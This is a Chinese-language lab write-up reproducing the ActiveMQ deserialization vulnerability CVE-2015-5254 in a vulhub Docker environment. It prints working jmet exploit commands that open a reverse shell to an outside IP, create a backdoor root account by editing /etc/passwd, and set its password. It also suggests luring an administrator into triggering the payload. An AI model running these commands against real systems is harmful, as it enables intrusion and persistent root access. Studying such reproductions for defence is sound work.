ActiveMQ反序列化漏洞（CVE-2015-5254）复现

悠悠 2024-04-07 10:57 81阅读 0赞

### 0x00 漏洞前言 ###

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件，它支持Java消息服务，集群，Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

### 0x01 漏洞环境 ###

1.在ubuntu16.04下安装docker/docker-compose:

# 安装pip
    curl -s https://bootstrap.pypa.io/get-pip.py | python3
    # 安装最新版docker
    curl -s https://get.docker.com/ | sh
    # 启动docker服务
    service docker start
    # 安装compose
    pip install docker-compose 
    # 下载项目
    wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
    unzip vulhub-master.zip
    cd vulhub-master
    # 进入某一个漏洞/环境的目录
     cd   activemq/CVE-2015-5254/
    # 自动化编译环境
    docker-compose build

![9d520ee492c72796cb8a7c940055a398.jpeg][]

2.运行漏洞环境：

docker-compose up -d

环境运行后，将监听61616和8161两个端口其中61616是工作端口，消息在这个端口进行传递; 8161是网络管理页面端口访问http://your-ip:8161即可看到网络管理页面，不过这个漏洞理论上是不需要网络的。

使用浏览器直接访问activemq，查看是否部署完毕

[http://45.32.101.90:8161/admin/][http_45.32.101.90_8161_admin](默认的用户名/密码为admin/admin)

![88f7a833b9967559f06666be193845e4.jpeg][]

### 0x02 漏洞复现 ###

1.漏洞利用过程如下：

a.构造(可以使用ysoserial)可执行命令的序列化对象

b.作为一个消息，发送给目标61616端口

c.访问的Web管理页面，读取消息，触发漏洞

2.使用jmet进行漏洞利用:

首先下载jmet的jar文件，并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial，无需再自己下载)，所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。

cd /opt
    
    wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
    
    mkdir external

3.执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME   45.32.101.90   61616

![982b29215e60f454c78dae2667c708f4.jpeg][]

4.此时会给目标的ActiveMQ添加一个名为事件的队列，可以我们通过http://45.32.101.90:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息：

![2d8ba8c65143ebddbe46761dc07705dd.jpeg][]

5.点击查看这条消息即可触发命令执行

![e24e60bf7f616f45be8e4c48489a9f5e.jpeg][]

6.此时进入容器

docker exec -it  cc0e9385f975  /bin/bash

![b0204e9aa566abca1a2b63019591f0f3.jpeg][]

7.可看到/ tmp /已成功创建，说明漏洞利用成功：

![f7e4c92a2ddf2779a6dc6df870128f64.jpeg][]

8.反弹shell:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/45.32.101.90/12340>&1" -Yp ROME45.32.101.90   61616

![0474c4608d00787341f198699003c047.jpeg][]

远程主机监听1234端口：

nc  -lvvp 1234

即可看到反弹是shell:

![dd828af4b902d06e9115773b31f257fc.jpeg][]

值得注意的是，通过网络管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下，我们可以诱导管理员访问我们的链接以触发，或者伪装成其他合法服务需要的消息，等待客户端访问的时候触发。

9.添加用户

执行jmet的命令添加test用户并将其添加到root组,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面，点击一下消息，触发它：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 test" -Yp ROME  45.32.101.90  61616

让我们再将passwd中的test的uid修改为0，使它拥有root权限,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面，点击一下消息，触发它。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/test:x:0/g" /etc/passwd" -Yp ROME   45.32.101.90  61616

让我们再为test用户设置一个密码,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面，点击一下消息，触发它。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "test:sd123456" | chpasswd" -Yp ROME   45.32.101.90   61616

到此为止，一个权限为root，密码为123456的用户即创建完毕。我们可以使用ssh直接远程登陆进入操作系统，并且还是最高权限。

![84a1b11ea2b1d887791e73e3dd72b8d2.jpeg][]

### 0x03 参考链接 ###

[https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf][https_www.blackhat.com_docs_us-16_materials_us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf]

[9d520ee492c72796cb8a7c940055a398.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/be79eb47b00b4c758152d7bfe2699c7f.jpeg
[http_45.32.101.90_8161_admin]: http://45.32.101.90:8161/admin/network.jsp
[88f7a833b9967559f06666be193845e4.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/87e138bf52a34991afb0c0a66b949157.jpeg
[982b29215e60f454c78dae2667c708f4.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/393903c23ec647b88d5a1396700c9fce.jpeg
[2d8ba8c65143ebddbe46761dc07705dd.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/09f6392e82314cccbb6afd62d7ecef28.jpeg
[e24e60bf7f616f45be8e4c48489a9f5e.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ecbe45cf37944e9ca1c8e2d381d0f5ab.jpeg
[b0204e9aa566abca1a2b63019591f0f3.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c06176502c1d47d4a5e61222c619768e.jpeg
[f7e4c92a2ddf2779a6dc6df870128f64.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/af70e314fad0418e8f7c50abc97496cc.jpeg
[0474c4608d00787341f198699003c047.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5fcecc42489641968ca0d22c909e3235.jpeg
[dd828af4b902d06e9115773b31f257fc.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/b3f81d63291548af83641ec76d770f5d.jpeg
[84a1b11ea2b1d887791e73e3dd72b8d2.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/8309878fdf41429698f8b3f8587fa8a1.jpeg
[https_www.blackhat.com_docs_us-16_materials_us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf]: https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf